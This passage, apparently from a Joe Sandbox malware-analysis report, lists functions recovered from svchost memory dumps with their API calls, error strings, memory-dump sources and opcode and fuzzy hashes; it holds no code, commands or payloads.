                                                                • Opcode Fuzzy Hash: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                • Instruction Fuzzy Hash: 7601807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E640 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_INCOMPLETE_CREDENTIALS
                                                                • API String ID: 3939687465-1320471878
                                                                • Opcode ID: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                • Instruction ID: f323c9d00cfdd915154e38847c330cf580a619b78118cc2c7b8d03f0b626ef3d
                                                                • Opcode Fuzzy Hash: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                • Instruction Fuzzy Hash: 4E01807921864086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E634 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_ENCRYPT_FAILURE
                                                                • API String ID: 3939687465-3371550302
                                                                • Opcode ID: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                • Instruction ID: f861c207d5825f972bc65dc37c45148fd4e7bb34ba7c13a3b085c281d1a8ca81
                                                                • Opcode Fuzzy Hash: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                • Instruction Fuzzy Hash: BB01807921860086F672AB91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E548 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_ALGORITHM_MISMATCH
                                                                • API String ID: 3939687465-3091687665
                                                                • Opcode ID: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                • Instruction ID: f3cf564578426ad5b4f95b97ae8c93a4ab4b71a5f3c0b96c20f94d4a135507f4
                                                                • Opcode Fuzzy Hash: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                • Instruction Fuzzy Hash: E101407921860086E6729F91F4913EAA2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                Function 00000173D015C530 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 232COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                • API String ID: 0-551583306
                                                                • Opcode ID: 80d50f79aa8e2e0e1798be875ed64e65ca41722820d66fff8b0017b3ebf657c0
                                                                • Instruction ID: b5dbe52857994ddedd27f0f9fb6ff1c95388e80490b01a038ea8a75dc5aaff3a
                                                                • Opcode Fuzzy Hash: 80d50f79aa8e2e0e1798be875ed64e65ca41722820d66fff8b0017b3ebf657c0
                                                                • Instruction Fuzzy Hash: 9DA19B7A2087844AFB758FE5E8483E9ABB0A745FC4F884011DE6D4B795FB78C640E744
                                                                Function 00000173D01A62C0 Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: callocfree
                                                                • String ID:
                                                                • API String ID: 306872129-0
                                                                • Opcode ID: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                • Instruction ID: 31e86a3fd8f08c75d311d53713074ed0b4322ae2544c8e742a090f4fdef2d4be
                                                                • Opcode Fuzzy Hash: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                • Instruction Fuzzy Hash: 46714936105BC085E3219F74E8483CE76A4F746BB8F480339DAB90E7DADBB98144C721
                                                                Function 00000173D0187A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CreateEventcalloc
                                                                • String ID: d
                                                                • API String ID: 2382962142-2564639436
                                                                • Opcode ID: f7e2894db741331a8fc1dc95fb01fb035a612877f8dc08512d1d4fdd7cec79f2
                                                                • Instruction ID: f0bf010d5afdeb5bed5a671fc1f495b3fe96e7161abd7981c259c0460e73aa83
                                                                • Opcode Fuzzy Hash: f7e2894db741331a8fc1dc95fb01fb035a612877f8dc08512d1d4fdd7cec79f2
                                                                • Instruction Fuzzy Hash: 13411C3A218A4091EB61DBA0D4913E9A3B5FB98FC4FC44535DA6D47699FF38C705E310
                                                                Function 00000173D019F5B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59stringwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagestrchrwcstombs
                                                                • String ID: Unknown error
                                                                • API String ID: 4171340688-83687255
                                                                • Opcode ID: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                • Instruction ID: 86a71d2f863220cd7fd31457d38ba08f1605654f98216c7a5752d7d498318c6d
                                                                • Opcode Fuzzy Hash: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                • Instruction Fuzzy Hash: 8D21927520C7C095EB318B66E8043DAA6A0AB8AFD4FC44214DABE03BD5EF7CC5419710
                                                                Function 00000173D0164840 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173D01AC700: GetModuleHandleA.KERNEL32 ref: 00000173D01AC746
                                                                  • Part of subcall function 00000173D01AC700: GetProcAddress.KERNEL32 ref: 00000173D01AC756
                                                                  • Part of subcall function 00000173D019FC30: GetModuleHandleW.KERNEL32 ref: 00000173D019FC44
                                                                • GetProcAddressForCaller.KERNELBASE ref: 00000173D01648A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc$Caller
                                                                • String ID: InitSecurityInterfaceW$secur32.dll$security.dll
                                                                • API String ID: 2824060896-1950755585
                                                                • Opcode ID: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                • Instruction ID: be8fe1388db26a687bd71cac438a3fb063e5b642f6fcb7c1c69a51af39670258
                                                                • Opcode Fuzzy Hash: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                • Instruction Fuzzy Hash: 89015E39B19B4582EF289B99E8917D9A3F0F745BC4FC84029996D83751FF7CC215A600
                                                                Function 00000173D01B1420 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                • API String ID: 0-3791222319
                                                                • Opcode ID: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                • Instruction ID: 63ee59fb8149c1cbe850d1b4c93a660f579155b6cc2908d0243e87db6e10c149
                                                                • Opcode Fuzzy Hash: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                • Instruction Fuzzy Hash: 28419E3A60864086FA31DEA6D6043ADA7B2A787FE4FD10211DE7E477D5FB39C641A700
                                                                Function 00000173D03B1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction ID: a36241c62b1244f77e5823f11bfe3d0c14403389b4d834f1266dd5466eb183fb
                                                                • Opcode Fuzzy Hash: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction Fuzzy Hash: F4E06D3170160086E714AFA2D82C389B7F1FB88F86F88C028C91D47351DFBE85A99740
                                                                Function 00000173D03B1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction ID: 7d5639ba676d07bb52b713e2b3db1e436179c95e61363d7ceaef6c2eea183e2b
                                                                • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction Fuzzy Hash: 1CE0ED7171154086E718ABA2D918299B7B1FB88F56F888028C91947311DF7985A99614
                                                                Function 00000173D03B37F8 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32 ref: 00000173D03B3811
                                                                • PathFindFileNameW.SHLWAPI ref: 00000173D03B3820
                                                                  • Part of subcall function 00000173D03B3D58: StrCmpNIW.KERNELBASE(?,?,?,00000173D03B272E), ref: 00000173D03B3D70
                                                                  • Part of subcall function 00000173D03B3CA4: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3CB2
                                                                  • Part of subcall function 00000173D03B3CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3CE0
                                                                  • Part of subcall function 00000173D03B3CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3D02
                                                                  • Part of subcall function 00000173D03B3CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3D1D
                                                                  • Part of subcall function 00000173D03B3CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3D3E
                                                                • CreateThread.KERNELBASE ref: 00000173D03B3867
                                                                  • Part of subcall function 00000173D03B1E38: GetCurrentThread.KERNEL32 ref: 00000173D03B1E43
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                • String ID:
                                                                • API String ID: 1683269324-0
                                                                • Opcode ID: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction ID: 6c6cffe8d40b8be3d238ae78d82b0008e1bc36cf584fe8d2676f900ba12deed7
                                                                • Opcode Fuzzy Hash: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction Fuzzy Hash: D4112D3061862081FB7AE7E1E6053D9A2B2AB54FC9FC04119A83E811A5DFFAC308A611
                                                                Function 00000173D01582D0 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastSleepgetsockopt
                                                                • String ID:
                                                                • API String ID: 3033474312-0
                                                                • Opcode ID: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                • Instruction ID: c8542c793d32793b661650a80b1e1729c4b4c4bf5de9b2f3f86690318f9cc4e5
                                                                • Opcode Fuzzy Hash: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                • Instruction Fuzzy Hash: F501443520C64187E7B08F95E4487AAE7B0F745FC4FE44024EA9D46BA4EB7DC545DB00
                                                                Function 00000173D01687F0 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000173D015AAE9), ref: 00000173D01687FB
                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000173D015AAE9), ref: 00000173D0168821
                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000173D015AAE9), ref: 00000173D0168835
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ExclusiveLock$Release$Acquire
                                                                • String ID:
                                                                • API String ID: 1021914862-0
                                                                • Opcode ID: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                • Instruction ID: e776fac5961d1524ed16e2f2ee6fd923f66027fed342ceffe4a9ae31a44a7bfc
                                                                • Opcode Fuzzy Hash: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                • Instruction Fuzzy Hash: 91F0543862844595FB24ABA5ECE43EAA2B4BB95F84FC00020D02E861A4FF6CC749E350
                                                                Function 00000173CFC10EE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: swprintf_s
                                                                • String ID: %
                                                                • API String ID: 3896565401-2567322570
                                                                • Opcode ID: ec58da689996205f5b274bb9e7b14e4efa8a6914dc8b0300c4614caad90e7c10
                                                                • Instruction ID: 6a0982112ed6e03d1b1d3d1fea3d9b6148c94cb0c0e9246db351840e7159bdd4
                                                                • Opcode Fuzzy Hash: ec58da689996205f5b274bb9e7b14e4efa8a6914dc8b0300c4614caad90e7c10
                                                                • Instruction Fuzzy Hash: B621042330C7C489E7229711E4413EEBBA1E799784F48C126EECC17B89CB2DC649DB01
                                                                Function 00000173CFC0F1E0 Relevance: 3.3, APIs: 2, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140 ref: 00000173CFC0F2E5
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00000173CFC0F595
                                                                  • Part of subcall function 00000173CFC11BD0: memmove.VCRUNTIME140(?,?,?,?,?,00000173CFC0C32B), ref: 00000173CFC11C2B
                                                                  • Part of subcall function 00000173CFC11BD0: memset.VCRUNTIME140(?,?,?,?,?,00000173CFC0C32B), ref: 00000173CFC11C38
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memset$_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID:
                                                                • API String ID: 48703092-0
                                                                • Opcode ID: 7ac7dec8e432cadfef363c3504a8cc20af8e12a7f67f43d9dcca2cd8afac82e6
                                                                • Instruction ID: 3486a4b7bb2cc9a9180c16b1fb2dc0b6428d1187234472cabdbe7694fcd0415f
                                                                • Opcode Fuzzy Hash: 7ac7dec8e432cadfef363c3504a8cc20af8e12a7f67f43d9dcca2cd8afac82e6
                                                                • Instruction Fuzzy Hash: DAC14B33B08B958AFB12DFA5D5403DC6771E748B98F408912DEAD27B59DE38C68AD340
                                                                Function 00000173CFC0F5D0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173CFC36700: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00000173CFC03B13,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000173CFC3670F
                                                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000173CFC33E56,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86), ref: 00000173CFC0F61C
                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00000173CFC0F6B6
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::cancel_current_task_lock_localesrealloc
                                                                • String ID:
                                                                • API String ID: 2876910798-0
                                                                • Opcode ID: 19c73d847408eb0d63e69c3f329de917da05adc446da4c3d1267b2b1ff8aaf5f
                                                                • Instruction ID: 271695acfe6bf9677f0c97485150084ab31ff6dfc68d93b4868020f5535c8f82
                                                                • Opcode Fuzzy Hash: 19c73d847408eb0d63e69c3f329de917da05adc446da4c3d1267b2b1ff8aaf5f
                                                                • Instruction Fuzzy Hash: 14417937309B4982EB15DF15E5803996370F788FC4F448922DAAE23B68DE39CA56E340
                                                                Function 00000173CFC0F6C0 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
